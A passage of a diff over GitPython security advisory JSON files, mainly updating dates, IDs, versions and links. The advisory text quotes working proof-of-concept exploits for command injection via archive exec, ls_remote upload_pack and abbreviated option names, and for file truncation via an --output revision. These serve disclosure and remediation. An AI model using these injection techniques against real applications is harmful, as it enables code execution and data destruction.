`--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-67324.json b/advisories/BREW-snowflake-cli-CVE-2026-67324.json index 8c65a64e5fb..948dfcade72 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-67324.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-67324", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-67325.json b/advisories/BREW-snowflake-cli-CVE-2026-67325.json index f87434c99c0..30af9f5d33f 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-67325.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-67325", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:56:16Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.51", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-67326.json b/advisories/BREW-snowflake-cli-CVE-2026-67326.json index 591165e2770..48b943b8dcb 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-67326.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-67326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-67326", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-mv93-w799-cj2w", "CVE-2026-67326" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.50", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-69097.json b/advisories/BREW-snowflake-cli-CVE-2026-69097.json index 493f72d528d..f9373560509 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-69097.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-69097.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-69097", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:56:16Z", "upstream": [ "GHSA-3rp5-jjmw-4wv2", "CVE-2026-69097" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.53", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73619.json b/advisories/BREW-snowflake-cli-CVE-2026-73619.json index 28a94155460..1bc4262b024 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73619.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73619", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:29Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73620.json b/advisories/BREW-snowflake-cli-CVE-2026-73620.json index a797a04cfd8..5e14b427148 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73620.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73620", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:56:16Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2026-73621.json b/advisories/BREW-snowflake-cli-CVE-2026-73621.json index dbcbb73a116..c5e6ecd5508 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-73621.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-73621", "published": "2026-08-14T09:40:25Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.56", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": 